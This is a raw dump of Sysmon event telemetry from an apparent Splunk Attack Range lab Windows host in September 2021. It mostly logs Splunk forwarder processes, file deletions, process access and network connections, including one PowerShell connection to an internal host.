354300x800000000000000036497658Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:02.746{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50560-false10.0.1.12-8000- 23542300x800000000000000036497661Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:33.721{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D112E51778022162D1971A27C864D49F,SHA256=5D17A6238B6117FA212C28F777003F155F09C5F0E913647215D01F647BE13420,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497664Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:34.738{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB0CAD1EFBA0B3593DA7C8DA61771E9C,SHA256=C41F7CDFBB4DD23ECFD6CD51E629E84DFF8A48E86B6061E8D048153CC703EA0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497663Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:34.620{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1138392D6134E73AFC387B0907D1C759,SHA256=322F0F2BC151F351F810257D79D9F65C03D0952008C7411E33BF991A7A85864F,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000036497662Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:04.224{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50561-false10.0.1.12-8089- 23542300x800000000000000036497666Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:35.756{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEA01EE6BDEE67A363F8F9B95A34560A,SHA256=B956A17FB734F753AFF8D81438044B6ED8A6682FF4A49066A3A1967200BC969D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497665Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:05.291{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50562-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497667Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:36.770{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1740670A99699E4B99AE1367025B2A1E,SHA256=C456B2C7C596D88C437820E40984868C4CC6C0571ED69F012FA27B12290B9B57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:37.929{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A12D-6140-8A56-04000000C801}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497675Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.927{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:37.927{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.927{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:37.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497671Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.926{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A12D-6140-8A56-04000000C801}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497670Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.926{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A12D-6140-8A56-04000000C801}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497669Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.909{B81B27B7-A12D-6140-8A56-04000000C801}5460C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497668Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:37.784{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A01F9C8F9BB6B4A38BD4AF3C880D47B9,SHA256=C356B3A7EB0F4DB1485E53FE26240D96BB531EEE7B03B5EB725634DDA4B73BAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036497690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.938{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDC52643E25FEDD6FA6C02D06AA1332B,SHA256=73E21B5C251797FB644449B824C20C878263CF756F259731A118ADEC52217505,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1899D4BE6639D2E3096BA1E15CFE1DED,SHA256=0043F40F88FA106892A633986602A44DAA9C3EC4795668E5680907A4833D355C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.802{B81B27B7-A12E-6140-8B56-04000000C801}64961284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:38.802{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=543D43E05FCA4F3B3CFCEF5C99AFA37A,SHA256=64FDE0F32E8F52FAFD653A70EB58C9A7D7EF04C9D79836FAEFDE71ECC9EB61CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.639{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A12E-6140-8B56-04000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497685Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.637{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000036497684Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.637{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497683Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.637{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497682Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:38.637{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497681Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.637{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A12E-6140-8B56-04000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497680Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.636{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A12E-6140-8B56-04000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.618{B81B27B7-A12E-6140-8B56-04000000C801}6496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036497678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:08.739{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50563-false10.0.1.12-8000- 10341000x800000000000000036497677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:38.087{B81B27B7-A12D-6140-8A56-04000000C801}5460800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.805{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86C6DB121372D55877D6B017A9502FD7,SHA256=E8107C41C5A49588FA51323608213E5B28070ED2AFE738C4E84EEA7505797319,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.774{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F6094344C4B8CFFA8A326FFA7C3E5D62,SHA256=737850B82841FC30DE68D8BA31CCF22A949549214257CF7C7E7CFF4C38ED5779,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A12F-6140-8C56-04000000C801}2616C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:39.270{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:18:39.270{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 